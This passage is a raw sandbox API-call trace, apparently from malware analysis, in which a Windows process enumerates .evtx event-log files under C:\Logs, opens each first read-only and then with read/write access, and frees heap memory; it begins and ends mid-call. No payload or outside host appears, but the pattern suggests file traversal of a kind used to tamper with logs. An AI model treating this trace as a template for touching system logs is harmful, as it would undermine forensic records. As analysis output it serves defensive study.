cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82b08 [0072.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x82b08, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 65 [0072.099] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b08 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0072.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.099] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0072.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.100] AreFileApisANSI () returned 1 [0072.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", lpUsedDefaultChar=0x0) returned 62 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.100] AreFileApisANSI () returned 1 [0072.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0072.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e718 [0072.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0072.101] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.101] GetFileType (hFile=0x410) returned 0x1 [0072.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0072.101] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.101] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.102] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.102] CloseHandle (hObject=0x410) returned 1 [0072.102] AreFileApisANSI () returned 1 [0072.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0072.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e7a0 [0072.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0072.102] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.102] GetFileType (hFile=0x410) returned 0x1 [0072.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.102] CloseHandle (hObject=0x410) returned 1 [0072.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.103] AreFileApisANSI () returned 1 [0072.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0072.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0072.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0072.103] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0072.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.103] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0072.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0072.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.105] AreFileApisANSI () returned 1 [0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpUsedDefaultChar=0x0) returned 60 [0072.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0072.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.105] AreFileApisANSI () returned 1 [0072.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0072.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0072.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0072.105] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.105] GetFileType (hFile=0x410) returned 0x1 [0072.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.106] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.106] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.106] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.106] CloseHandle (hObject=0x410) returned 1 [0072.106] AreFileApisANSI () returned 1 [0072.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0072.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0072.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0072.106] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.106] GetFileType (hFile=0x410) returned 0x1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.107] CloseHandle (hObject=0x410) returned 1 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.107] AreFileApisANSI () returned 1 [0072.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0072.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0072.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0072.107] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.108] HeapFree (in: 